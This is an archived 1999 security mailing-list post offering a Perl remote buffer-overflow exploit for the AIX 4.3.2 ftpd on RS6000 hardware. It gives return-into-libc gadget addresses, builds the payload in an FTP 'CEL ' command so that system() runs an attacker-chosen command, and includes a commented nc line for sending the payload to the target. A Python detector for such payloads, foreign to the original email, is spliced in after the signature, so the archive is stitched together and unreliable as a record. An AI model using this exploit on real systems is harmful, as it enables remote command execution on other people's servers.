Remote bufferoverflow exploit for ftpd from AIX 4.3.2 running on

From: Gerrie (gerrieat_private)
Date: Mon Sep 27 1999 - 20:03:18 PDT


    One of our crew members wrote this exploit for the Hack-me project during
    HIT2000. I searched on securityfocus and saw it was still not mailed over here.
    IBM has been mailed but due to lack of RS6000 knowledge they didn't get it
    working.....
    
    #!/usr/bin/perl
    # *** Synnergy Networks
    
    # * Description:
    #
    # Remote bufferoverflow exploit for ftpd from AIX 4.3.2 running on an
    # RS6000. (power)
    # This is a return-into-libc exploit specifically crafted for
    # one box and it is very unlikely to work on another box
    
    # * Author:
    #
    # dvorak (dvorakat_private)
    # Synnergy Networks (c) 1999,  http://www.synnergy.net
    
    # * Greets:
    #
    # Synnergy Networks, Hit2000 crew, Emphyrio, shevek
    
    # * Comments:
    #
    # A full working exploit will be released later on.
    # The addresses point to positions in the program or libraries,
    # only the relevant instructions are shown also note that b r0
    # is in fact something like mfsbr r0, bsbr or what that is in
    # RS6000 assembly.
    #
    # The final call is to system which needs the following arguments:
    # r3 = address of command to execute
    # r2 = TOC (what is TOC anyway), I don't know if it does matter but
    #      we set it anyway (we can so why not do it)
    # r1 = SP but this is ok already,
    # the rest is free so it seems.
    #
    # Our route:
    # 0x10010150: sets r2 to a place in the buffer and jumps to 0x10015228
    # 0x10015228: loads r12 with a value from our buffer
    #             loads r0 with the next address to jump to (0x1001038c)
    #             and sets r2 to another place in our buffer
    # 0x1001038c: sets r3 to a place in the buffer (finally!)
    #             sets r0 to next address to jump to (0xd00406d4, system(...))
    #
    # The flow with registers is thus:
    # r2 = 0x14(r1)
    # r12 = 0x110(r2)
    # r0 = 0x0(r12)
    # r2 = 0x4(r12)
    # r3 = 0x40(r1)
    # r12 = 0x3c(r2)
    # 0x14(r1) = r12 this is the place where TOC is stored but it doesn't seem
    #            to matter
    # r0 = 0x0(r12)
    # r2 = 0x04(r12)
    # and off we go...
    #
    # We set:
    # $buf = the buffer on the stack; $buf[0] is the first byte in the buffer,
    # but we will count offsets from 4 (the first 4 bytes are just "CEL "; that
    # doesn't matter, only the space does: it makes sure the rest of the buffer
    # stays the way it is and isn't converted into lower case)
    #
    # Offsets:
    # 0x000: 0x1001038c
    # 0x004: buf[0]
    # 0x008: this is the place where the address of the systemcall is taken from
    #        0xd00406d4 in our case
    # 0x00c: this is the address where r2 is loaded
    #        from just before the call to
    #        system(..) we set it to the TOC in our program we don't know if it
    #        matters and if the TOC is constant between hosts
    # 0x03c: buf[08]
    # 0x110: buf[0]
    # 0x204: return address (0x10010150)
    # 0x210: buf[0]
    # 0x23c: buf[0x240]
    # 0x240: "/tmp/sh" or whatever command you want to execute
    # r1 points to buf[0x1fc]
    #
    # I assume the positions in the libraries/program are fixed and that TOC
    # either doesn't matter or is fixed to please enlighten me on these topics.
    #
    # 0x10010150:
    #     l   r2, 0x14(r1)
    #     b   0x10015228
    # 0x10015228:
    #     l   r12, 0x110(r2)
    #     st  r12, 0x14(r1)
    #     l   r0, 0x0(r12)
    #     l   r2, 0x4(r12)
    #     b   r0
    # 0x1001038c:
    #     l   r3, 0x40(r1)
    #     b   0x100136f8
    # 0x100136f8:
    #     l   r12, 0x3c(r2)
    #     st  r12, 0x14(r1)
    #     l   r0,  0x0(r12)
    #     l   r2,  0x04(r12)
    
    # *** Synnergy Networks
    
    $bufstart = 0x2ff22724;         # this is our first guess
    $nop = "\xde\xad\xca\xfe";
    $buf = "CEL ";
    $buf .= "\x10\x01\x03\x8c";     # 0 address of second piece of
                                    # 'borrowed' code
    $buf .= pack ("N", $bufstart);  # 4
    $buf .= "\xd0\x04\x06\xd4";     # 8 system call..
    $buf .= "\xf0\x14\x63\x5c";     # c TOC
    $offset = 0x10;
    while ($offset < 0x3c) {
        $offset += 4;
        $buf .= $nop;
    }
    $buf .= pack ("N", $bufstart + 0x008);
    $offset += 4;
    while ($offset < 0x110) {
        $offset += 4;
        $buf .= $nop;
    }
    $buf .= pack ("N", $bufstart);
    $offset += 4;
    while ($offset < 0x204) {
        $offset += 4;
        $buf .= $nop;
    }
    $buf .= "\x10\x01\x01\x50";
    $offset += 4;
    while ($offset < 0x210) {
        $offset += 4;
        $buf .= $nop;
    }
    $buf .= pack ("N", $bufstart);
    $offset += 4;
    while ($offset < 0x23c) {
        $offset += 4;
        $buf .= $nop;
    }
    $buf .= pack ("N", $bufstart + 0x240);
    $offset += 4;
    while ($offset < 0x240) {
        $offset += 4;
        $buf .= $nop;
    }
    # this is the command that will be run through system
    $buf .= "/tmp/sh";
    $buf .= "\n";
    
    # of course you should change this.
    # open F, "| nc -v -v -n 192.168.2.12 21";
    open F, "| od -tx1";
    print F $buf;      # print, not printf: $buf is data, not a format string
    close F;
    
    # EOF
    
    gtx,
    Gerrie
    My answers and statements are entirely my own responsibility.
    tel. 06-24119524
    Fun & Secure
    http://www.hit2000.org
    Join our RC5 Team!
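As an added example from the defender's side (not code from the original post, dvorak or Synnergy), a small Python check over a constructed FTP command stream: it flags control-channel commands whose argument is oversized, contains non-printable bytes, or is dominated by one repeated 4-byte word, the three traits of the "CEL " payload built above. The thresholds and the sample stream are assumptions.

```python
import re

# Constructed sample of an FTP control-channel stream (not from the post):
# two ordinary commands, then an oversized, mostly binary "CEL " line of the
# shape the exploit above builds. The filler here is synthetic, not its bytes.
SAMPLE_STREAM = (
    b"USER anonymous\r\n"
    b"PASS guest@example.org\r\n"
    b"CEL " + b"\xde\xad\xca\xfe" * 144 + b"/tmp/sh\n"
)

# Assumed thresholds: RFC 959 command lines are short and their arguments are
# printable ASCII; anything else on the control channel deserves a look.
MAX_ARG_LEN = 255
PRINTABLE = re.compile(rb"^[\x20-\x7e]*$")

def split_commands(stream):
    """Yield (verb, argument) per line; accepts CRLF or bare LF terminators."""
    for line in stream.splitlines():
        if line:
            verb, _, arg = line.partition(b" ")
            yield verb, arg

def repeated_word(arg, min_repeats=16):
    """Most common 4-byte aligned word and its count if it repeats at least
    min_repeats times (the signature of an address/filler sled), else None."""
    words = [arg[i:i + 4] for i in range(0, len(arg) - 3, 4)]
    if not words:
        return None
    top = max(set(words), key=words.count)
    return (top, words.count(top)) if words.count(top) >= min_repeats else None

def inspect_command(verb, arg):
    """Reasons this command looks like an overflow attempt; [] if benign."""
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append("argument length %d exceeds %d" % (len(arg), MAX_ARG_LEN))
    if not PRINTABLE.match(arg):
        reasons.append("argument contains non-printable bytes")
    sled = repeated_word(arg)
    if sled:
        reasons.append("4-byte word %r repeated %d times" % sled)
    return reasons

def find_suspicious(stream):
    """Run inspect_command over a stream; return [(verb, reasons)] for hits."""
    checked = [(v, inspect_command(v, a)) for v, a in split_commands(stream)]
    return [(v, r) for v, r in checked if r]

if __name__ == "__main__":
    for verb, reasons in find_suspicious(SAMPLE_STREAM):
        print(verb.decode("ascii", "replace"), "->", "; ".join(reasons))
```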
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:05:38 PDT